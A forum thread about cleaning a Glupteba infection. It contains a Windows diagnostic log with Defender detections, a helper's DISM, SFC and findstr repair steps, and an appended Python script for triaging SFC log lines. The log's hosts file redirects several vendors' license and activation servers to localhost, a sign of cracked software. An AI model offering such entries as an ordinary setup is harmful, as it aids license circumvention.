2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-02-18 21:23 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Root\Office16\AppVIsvSubsystems32.dll
2019-02-18 21:23 - 2019-02-18 21:23 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Root\Office16\c2r32.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11262019134949250\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint
26-11-2019 13:38:10 Malwarebytes Anti-Rootkit Restore Point

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/26/2019 01:50:28 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:49:59 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:40:02 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:39:32 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:38:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93
Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5
Exception code: 0xc0000005
Fault offset: 0x0001aed4
Faulting process id: 0x3f60
Faulting application start time: 0x01d5a43fe7d74f43
Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe
Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts
Report Id: 4fe66871-8230-48aa-ab8d-ff6dcf8419f1
Faulting package full name:
Faulting package-relative application ID:

Error: (11/26/2019 12:49:35 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 09:38:59 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 09:38:29 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.


System errors:
=============
Error: (11/26/2019 01:51:48 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:51:48 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:41:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:41:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 11:47:47 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-26 13:36:18.582
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win64/RootAgent
ID: 2147727907
Severity: Severe
Category: Trojan
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:36:18.561
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win64/RootAgent
ID: 2147727907
Severity: Severe
Category: Trojan
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-k.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:25.151
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...53&enterprise=0
Name: VirTool:Win64/Glupteba.B
ID: 2147730753
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:25.140
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...53&enterprise=0
Name: VirTool:Win64/Glupteba.B
ID: 2147730753
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-k.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:20.632
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...52&enterprise=0
Name: VirTool:Win64/Glupteba.A
ID: 2147730752
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\Winmon.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\Winmon.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-11-26 13:44:03.413
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-11-26 13:44:03.409
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-11-25 01:38:49.794
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 19%
Total physical RAM: 16331.55 MB
Available physical RAM: 13137.85 MB
Total Virtual: 16631.55 MB
Available Virtual: 12049.41 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:63.61 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:158.11 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:214.56 GB) NTFS

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================


  • 0

#9
spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

During a second (last)  check, mbar did not find anything.
It says that I am clear.
Do you think there are more steps I should take?


  • 0

#10
RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Let's run dism and sfc to check that your system files are healthy:

 

Open an elevated command prompt:

http://www.howtogeek...-in-windows-10/

(If you open an elevated Command Prompt properly it will say Administrator: Command Prompt in the margin at the top of the window)


Once you have an elevated command prompt:

Type:

 DISM  /Online  /Cleanup-Image  /RestoreHealth


 (I use two spaces so you can be sure to see where one space goes.)
Hit Enter.  This will take a while (10-20 minutes) to complete.  Once the prompt returns:

Reboot.  Open an elevated Command Prompt again and type (with an Enter after the line):

sfc  /scannow




This will also take a few minutes.  

When it finishes it will say one of the following:

Windows did not find any integrity violations (a good thing)
Windows Resource Protection found corrupt files and repaired them (a good thing)
Windows Resource Protection found corrupt files but was unable to fix some (or all) of them (not a good thing)

If you get the last result then type:

findstr  /c:"[SR]"  \windows\logs\cbs\cbs.log  >  %UserProfile%\desktop\junk.txt


Hit Enter.  Then type:
 

notepad %UserProfile%\desktop\junk.txt


Hit Enter.

 Copy the text from notepad and paste it into a reply.


After you finish SFC, regardless of the result:



1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop:
2. Right-click VEW.exe and Run AS Administrator
3. Under 'Select log to query', select:

* System
4. Under 'Select type to list', select:
* Error
* Warning


Then use the 'Number of events' as follows:


1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.


Please post the Output log in your next reply then repeat but select Application.  (Each time you run VEW it overwrites the log so copy the first one to a Reply or rename it before running it a second time.)
 


  • 0
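A triage sketch for the `[SR]` extract that the `findstr` step in the post above writes to junk.txt. This is an added example, not part of the original thread and not a Microsoft tool: it groups the lines into SFC runs, counts the components verified, and keeps only the non-routine lines. The function names are hypothetical, the sample lines are constructed (the "Cannot repair member file" entry uses placeholder file and component names), and treating a drop in the CSI sequence counter as the start of a new run is a heuristic assumption.

```python
import re

# Line shape produced by: findstr /c:"[SR]" \windows\logs\cbs\cbs.log
# "<date> <time>, <level>   CSI    <8 hex digit sequence> [SR] <message>"
SR_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}), (?P<level>\w+)\s+CSI\s+"
    r"(?P<seq>[0-9a-fA-F]{8}) \[SR\] (?P<msg>.*\S)\s*$"
)
# "Verifying 100 components"; older builds also print the count in hex.
VERIFYING = re.compile(r"^Verifying (\d+)(?: \(0x[0-9a-fA-F]+\))? components?$")
# Progress messages that say nothing about the outcome.
ROUTINE = {"Beginning Verify and Repair transaction", "Verify complete"}


def parse_sr_lines(text):
    """Return (timestamp, sequence, message) for every well-formed [SR] line."""
    entries = []
    for line in text.splitlines():
        m = SR_LINE.match(line.strip())
        if m:  # blank or unrecognised lines are skipped, not fatal
            entries.append((m["ts"], int(m["seq"], 16), m["msg"]))
    return entries


def split_runs(entries):
    """Start a new run whenever the sequence counter stops increasing.

    Heuristic (assumption): the counter restarts with each servicing session,
    so a value that is not higher than the previous one marks a new SFC run.
    """
    runs, prev_seq = [], None
    for entry in entries:
        seq = entry[1]
        if prev_seq is None or seq <= prev_seq:
            runs.append([])
        runs[-1].append(entry)
        prev_seq = seq
    return runs


def summarise(run):
    """Count verified components and collect every non-routine message."""
    components, findings = 0, []
    for ts, _seq, msg in run:
        m = VERIFYING.match(msg)
        if m:
            components += int(m.group(1))
        elif msg not in ROUTINE:
            findings.append((ts, msg))
    return {"start": run[0][0], "end": run[-1][0],
            "components": components, "findings": findings}


def triage(text):
    return [summarise(run) for run in split_runs(parse_sr_lines(text))]


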